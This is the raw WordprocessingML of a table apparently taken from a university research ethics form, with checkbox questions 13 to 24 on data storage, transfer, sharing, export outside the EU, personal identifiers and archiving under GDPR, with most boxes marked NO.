              <w:p w14:paraId="18FC8B16"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1575544959"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2B708B6F"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1FBF6181" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="37A4002E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="29A7A706" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">For all stored data, explain the measures in place to ensure the security of the data collected, data confidentiality, including details of </w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve"> protection, encryption, anonymisation and pseudonymisation:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="20FED8EB" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C0C60EB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="51EEBCAF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4EC970F2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="1963B6BC" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6BD48383" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:lastRenderedPageBreak/>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52C6381E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>All Data Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="51DC487E" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="216609FD" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6299F185" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Will the research activity involve any of the following activities:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46D36783" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3736F185" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="328E0000" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0AD5E710" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B0E09C2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Electronic transfer of data in any form?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-243347341"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7499331C"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="809138048"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="344ABEFF"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6C7DF404" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0CA2BECB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A7E2D76" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Sharing of data with others at the University?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="206609976"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="35A2FF27"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1162969108"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="49235B9A"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19D0533D" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="37072BD3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2929068F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Sharing of data with other organisations?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-853718064"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="25ED6BAD"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-692922631"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="20488984"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677FFC5B" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="68160D2B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31042BCC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Export of data outside the European Union or importing of data from outside the UK?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1311477419"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="081110A6"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-982232726"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="11B85420"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72DE6691" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="340119C2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2945F421" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Use of personal addresses, postcodes, faxes, emails or telephone numbers?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="580263657"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7BB368DB"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="705679297"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2CCA95B7"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40DF36DB" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5911C7C1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A29135A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Publication of data that might allow identification of individuals?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1833259881"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="34D82E2D"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="48495840"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="64703CF4"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049D0769" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E483DB5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="447433E7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Use of data management system?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1317182428"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="38F7F504"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1535304944"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="1B7F7AF7"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62F02151" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="17320B08" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75DDFB1C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Data archiving?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="337199998"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="5FF74CC4"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-433046498"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2D48F51D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☒</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="2A49BB9C" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="313AFAB7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EB11399" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>If YES to any question, please provide full details, explaining how this will be conducted in accordance with the GDPR and DPA (and/or any international equivalent):</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="515D2765" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69AF2025" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E71086D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
